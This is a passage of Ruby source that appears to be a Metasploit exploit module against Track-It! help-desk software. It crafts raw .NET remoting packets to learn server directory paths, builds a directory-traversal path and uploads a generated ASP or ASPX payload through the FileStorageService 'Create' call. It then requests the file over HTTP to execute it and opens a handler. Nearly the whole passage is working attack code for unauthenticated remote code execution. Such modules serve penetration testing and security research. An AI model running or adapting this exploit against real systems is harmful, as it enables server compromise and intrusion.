type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
|
||||
uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
|
||||
|
||||
file_storage_dir_str = "FileStorageDataDirectory"
|
||||
web_data_dir_str = "WebDataCacheDirectory"
|
||||
|
||||
packet_size =
|
||||
@packet_header_pre_uri_size.length +
|
||||
2 + # uri_size
|
||||
@packet_header_pre_uri.length +
|
||||
uri.length +
|
||||
@packet_header_post_uri.length +
|
||||
packet_body_start_pre_method_size.length +
|
||||
1 + # method_size
|
||||
method.length +
|
||||
@packet_body_pre_type_size.length +
|
||||
1 + # type_size
|
||||
@packet_body_pre_type.length +
|
||||
type.length
|
||||
|
||||
# start of packet and packet size (4 bytes)
|
||||
buf = @packet_header_pre_packet_size.pack('C*')
|
||||
buf << Array(packet_size).pack('L*')
|
||||
|
||||
# uri size (2 bytes)
|
||||
buf << @packet_header_pre_uri_size.pack('C*')
|
||||
buf << Array(uri.length).pack('S*')
|
||||
|
||||
# uri
|
||||
buf << @packet_header_pre_uri.pack('C*')
|
||||
buf << uri.bytes.to_a.pack('C*')
|
||||
buf << @packet_header_post_uri.pack('C*')
|
||||
|
||||
# method name
|
||||
buf << packet_body_start_pre_method_size.pack('C*')
|
||||
buf << Array(method.length).pack('C*')
|
||||
buf << method.bytes.to_a.pack('C*')
|
||||
|
||||
# type name
|
||||
buf << @packet_body_pre_type_size.pack('C*')
|
||||
buf << Array(type.length).pack('C*')
|
||||
buf << @packet_body_pre_type.pack('C*')
|
||||
buf << type.bytes.to_a.pack('C*')
|
||||
|
||||
buf << @packet_terminator.pack('C*')
|
||||
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
|
||||
if sock.nil?
|
||||
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
|
||||
else
|
||||
print_status("#{rhost}:#{@remoting_port} - Getting traversal path...")
|
||||
end
|
||||
sock.write(buf)
|
||||
|
||||
# read from the socket for up to (SLEEP / 2) seconds
|
||||
counter = 0
|
||||
web_data_dir = nil
|
||||
file_storage_dir = nil
|
||||
while counter < datastore['SLEEP']
|
||||
begin
|
||||
readable,writable,error = IO.select([sock], nil, nil, datastore['SLEEP'] / 2)
|
||||
if readable == nil
|
||||
break
|
||||
else
|
||||
sock = readable[0]
|
||||
end
|
||||
buf_reply = sock.readpartial(4096)
|
||||
if (index = (buf_reply.index(file_storage_dir_str))) != nil
|
||||
# after file_storage_dir_str, discard 5 bytes then get file_storage_dir_size
|
||||
size = buf_reply[index + file_storage_dir_str.length + 5,1].unpack('C*')[0]
|
||||
file_storage_dir = buf_reply[index + file_storage_dir_str.length + 6, size]
|
||||
if file_storage_dir != nil and web_data_dir != nil
|
||||
break
|
||||
end
|
||||
end
|
||||
if (index = (buf_reply.index(web_data_dir_str))) != nil
|
||||
# after web_data_dir_str, discard 5 bytes then get web_data_dir_size
|
||||
size = buf_reply[index + web_data_dir_str.length + 5,1].unpack('C*')[0]
|
||||
web_data_dir = buf_reply[index + web_data_dir_str.length + 6, size]
|
||||
if file_storage_dir != nil and web_data_dir != nil
|
||||
break
|
||||
end
|
||||
end
|
||||
counter += 1
|
||||
sleep(0.5)
|
||||
rescue SystemCallError
|
||||
break
|
||||
end
|
||||
end
|
||||
sock.close
|
||||
|
||||
if file_storage_dir != nil and web_data_dir != nil
|
||||
# Now we need to adjust the paths before we calculate the traversal_size
|
||||
# On the web_data_dir, trim the last part (the Cache directory) and add the Web\Installers part
|
||||
# which is the path accessible without authentication.
|
||||
# On the file_storage_dir, add the IncidentRepository part where the files land by default.
|
||||
# We then find the common string and calculate the traversal_path.
|
||||
web_data_dir = web_data_dir[0,web_data_dir.rindex("\\")] + "\\Web\\Installers\\"
|
||||
file_storage_dir << "\\Repositories\\IncidentRepository"
|
||||
common_str = longest_common_substr([file_storage_dir, web_data_dir])
|
||||
traversal_size = file_storage_dir[common_str.rindex("\\"), file_storage_dir.length].scan("\\").length
|
||||
traversal_path = "..\\" * traversal_size + web_data_dir[common_str.rindex("\\") + 1,common_str.length]
|
||||
return traversal_path
|
||||
else
|
||||
return nil
|
||||
end
|
||||
# Note: version 8 always returns nil as the GetProductDeploymentValues does not exist
|
||||
end
|
||||
|
||||
|
||||
def send_file(traversal_path, filename, file_content)
|
||||
#
|
||||
# FileStorageService packet structure:
|
||||
#
|
||||
# @packet_header_pre_packet_size
|
||||
# packet_size (4 bytes)
|
||||
# @packet_header_pre_uri_size
|
||||
# uri_size (2 bytes)
|
||||
# @packet_header_pre_uri
|
||||
# uri
|
||||
# @packet_header_post_uri
|
||||
# packet_body_start_pre_method_size
|
||||
# method_size (1 byte)
|
||||
# method
|
||||
# @packet_body_pre_type_size
|
||||
# type_size (1 byte)
|
||||
# @packet_body_pre_type
|
||||
# type
|
||||
# packet_body_pre_repository_size
|
||||
# repository_size (1 byte)
|
||||
# repository
|
||||
# packet_body_pre_filepath_size
|
||||
# filepath_size (1 byte)
|
||||
# filepath
|
||||
# packet_body_pre_binary_lib_size
|
||||
# binary_lib_size (1 byte)
|
||||
# binary_lib
|
||||
# packet_body_pre_file_content_decl_size
|
||||
# file_content_decl_size (1 byte)
|
||||
# file_content_decl
|
||||
# packet_body_pre_filesize
|
||||
# file_size (4 bytes)
|
||||
# packet_body_pre_filecontent
|
||||
# file_content
|
||||
# @packet_terminator
|
||||
#
|
||||
# .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx
|
||||
#
|
||||
packet_body_start_pre_method_size = [
|
||||
0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff,
|
||||
0xff, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x15, 0x14, 0x00, 0x00, 0x00, 0x12
|
||||
]
|
||||
|
||||
packet_body_pre_repository_size = [
|
||||
0x10, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
|
||||
0x00, 0x0a, 0x09, 0x02, 0x00, 0x00, 0x00, 0x06,
|
||||
0x03, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_filepath_size = [
|
||||
0x06, 0x04, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_binary_lib_size = [
|
||||
0x0c, 0x05, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_file_content_decl_size = [
|
||||
0x05, 0x02, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_file_size = [
|
||||
0x01, 0x00, 0x00, 0x00, 0x09, 0x5f, 0x72, 0x61,
|
||||
0x77, 0x42, 0x79, 0x74, 0x65, 0x73, 0x07, 0x02,
|
||||
0x05, 0x00, 0x00, 0x00, 0x09, 0x06, 0x00, 0x00,
|
||||
0x00, 0x0f, 0x06, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_filecontent = [ 0x02 ]
|
||||
|
||||
service = "TrackIt.Core.FileStorageService".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
method = "Create"
|
||||
type = "TrackIt.Core.FileStorage.IFileStorageSecureDelegator, TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
repository = "IncidentRepository"
|
||||
binary_lib = "TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
file_content_decl = "TrackIt.Core.FileStorage.FileContent".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
|
||||
uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
|
||||
|
||||
filepath = traversal_path + filename
|
||||
|
||||
packet_size =
|
||||
@packet_header_pre_uri_size.length +
|
||||
2 + # uri_size
|
||||
@packet_header_pre_uri.length +
|
||||
uri.length +
|
||||
@packet_header_post_uri.length +
|
||||
packet_body_start_pre_method_size.length +
|
||||
1 + # method_size
|
||||
method.length +
|
||||
@packet_body_pre_type_size.length +
|
||||
1 + # type_size
|
||||
@packet_body_pre_type.length +
|
||||
type.length +
|
||||
packet_body_pre_repository_size.length +
|
||||
1 + # repository_size
|
||||
repository.length +
|
||||
packet_body_pre_filepath_size.length +
|
||||
1 + # filepath_size
|
||||
filepath.length +
|
||||
packet_body_pre_binary_lib_size.length +
|
||||
1 + # binary_lib_size
|
||||
binary_lib.length +
|
||||
packet_body_pre_file_content_decl_size.length +
|
||||
1 + # file_content_decl_size
|
||||
file_content_decl.length +
|
||||
packet_body_pre_file_size.length +
|
||||
4 + # file_size
|
||||
packet_body_pre_filecontent.length +
|
||||
file_content.length
|
||||
|
||||
# start of packet and packet size (4 bytes)
|
||||
buf = @packet_header_pre_packet_size.pack('C*')
|
||||
buf << Array(packet_size).pack('L*')
|
||||
|
||||
# uri size (2 bytes)
|
||||
buf << @packet_header_pre_uri_size.pack('C*')
|
||||
buf << Array(uri.length).pack('S*')
|
||||
|
||||
# uri
|
||||
buf << @packet_header_pre_uri.pack('C*')
|
||||
buf << uri.bytes.to_a.pack('C*')
|
||||
buf << @packet_header_post_uri.pack('C*')
|
||||
|
||||
# method name
|
||||
buf << packet_body_start_pre_method_size.pack('C*')
|
||||
buf << Array(method.length).pack('C*')
|
||||
buf << method.bytes.to_a.pack('C*')
|
||||
|
||||
# type name
|
||||
buf << @packet_body_pre_type_size.pack('C*')
|
||||
buf << Array(type.length).pack('C*')
|
||||
buf << @packet_body_pre_type.pack('C*')
|
||||
buf << type.bytes.to_a.pack('C*')
|
||||
|
||||
# repository name
|
||||
buf << packet_body_pre_repository_size.pack('C*')
|
||||
buf << Array(repository.length).pack('C*')
|
||||
buf << repository.bytes.to_a.pack('C*')
|
||||
|
||||
# filepath
|
||||
buf << packet_body_pre_filepath_size.pack('C*')
|
||||
buf << Array(filepath.length).pack('C*')
|
||||
buf << filepath.bytes.to_a.pack('C*')
|
||||
|
||||
# binary lib name
|
||||
buf << packet_body_pre_binary_lib_size.pack('C*')
|
||||
buf << Array(binary_lib.length).pack('C*')
|
||||
buf << binary_lib.bytes.to_a.pack('C*')
|
||||
|
||||
# file content decl
|
||||
buf << packet_body_pre_file_content_decl_size.pack('C*')
|
||||
buf << Array(file_content_decl.length).pack('C*')
|
||||
buf << file_content_decl.bytes.to_a.pack('C*')
|
||||
|
||||
# file size (4 bytes)
|
||||
buf << packet_body_pre_file_size.pack('C*')
|
||||
buf << Array(file_content.length).pack('L*')
|
||||
|
||||
# file contents
|
||||
buf << packet_body_pre_filecontent.pack('C*')
|
||||
buf << file_content
|
||||
|
||||
buf << @packet_terminator.pack('C*')
|
||||
|
||||
# send the packet and ignore the response
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
|
||||
if sock.nil?
|
||||
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
|
||||
else
|
||||
print_status("#{rhost}:#{@remoting_port} - Uploading payload to #{filename}")
|
||||
end
|
||||
sock.write(buf)
|
||||
sock.close
|
||||
# We can't really register our files for cleanup as most of the time we run under the IIS user, not SYSTEM
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
@packet_header_pre_packet_size= [
|
||||
0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00
|
||||
]
|
||||
|
||||
@packet_header_pre_uri_size = [
|
||||
0x04, 0x00, 0x01, 0x01
|
||||
]
|
||||
|
||||
@packet_header_pre_uri = [
|
||||
0x00, 0x00
|
||||
]
|
||||
|
||||
# contains binary type (application/octet-stream)
|
||||
@packet_header_post_uri = [
|
||||
0x06, 0x00, 0x01, 0x01, 0x18, 0x00, 0x00, 0x00,
|
||||
0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74,
|
||||
0x69, 0x6f, 0x6e, 0x2f, 0x6f, 0x63, 0x74, 0x65,
|
||||
0x74, 0x2d, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d,
|
||||
0x00, 0x00
|
||||
]
|
||||
|
||||
@packet_body_pre_type_size = [ 0x12 ]
|
||||
|
||||
@packet_body_pre_type = [ 0x01 ]
|
||||
|
||||
@packet_terminator = [ 0x0b ]
|
||||
|
||||
version = get_version
|
||||
if version != nil
|
||||
@version = version[0].to_i
|
||||
else
|
||||
# We assume it's version 9 or below because we couldn't find any version identifiers
|
||||
@version = 9
|
||||
end
|
||||
|
||||
@remoting_port = datastore['RPORT_REMOTING']
|
||||
|
||||
traversal_path = get_traversal_path
|
||||
if traversal_path == nil
|
||||
print_error("#{rhost}:#{@remoting_port} - Could not get traversal path, falling back to defaults")
|
||||
case @version
|
||||
when 9
|
||||
traversal_path = "..\\..\\..\\..\\Web Add-On\\Web\\Installers\\"
|
||||
when 10
|
||||
traversal_path = "..\\..\\..\\..\\..\\Numara Track-It! Web\\Web\\Installers\\"
|
||||
when 11
|
||||
traversal_path = "..\\..\\..\\..\\..\\Track-It! Web\\Web\\Installers\\"
|
||||
end
|
||||
end
|
||||
|
||||
# generate our payload
|
||||
exe = generate_payload_exe
|
||||
if @version == 9
|
||||
file_content = Msf::Util::EXE.to_exe_asp(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".asp"
|
||||
else
|
||||
file_content = Msf::Util::EXE.to_exe_aspx(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".aspx"
|
||||
end
|
||||
|
||||
send_file(traversal_path, filename, file_content)
|
||||
|
||||
# sleep a few seconds, sometimes the service takes a while to write to disk
|
||||
sleep(datastore['SLEEP'])
|
||||
|
||||
print_status("#{peer} - Executing payload")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res
|
||||
if res.code == 500
|
||||
print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX"))
|
||||
# try again but now use ASPX instead of ASP or vice-versa
|
||||
if @version == 9
|
||||
file_content = Msf::Util::EXE.to_exe_aspx(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".aspx"
|
||||
else
|
||||
file_content = Msf::Util::EXE.to_exe_asp(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".asp"
|
||||
end
|
||||
send_file(traversal_path, filename, file_content)
|
||||
|
||||
# sleep a few seconds, sometimes the service takes a while to write to disk
|
||||
sleep(datastore['SLEEP'])
|
||||
|
||||
print_status("#{peer} - Executing payload")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
||||
if not res or res.code != 200
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Could not execute payload" + (res ? ", got HTTP code #{res.code.to_s}": ""))
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue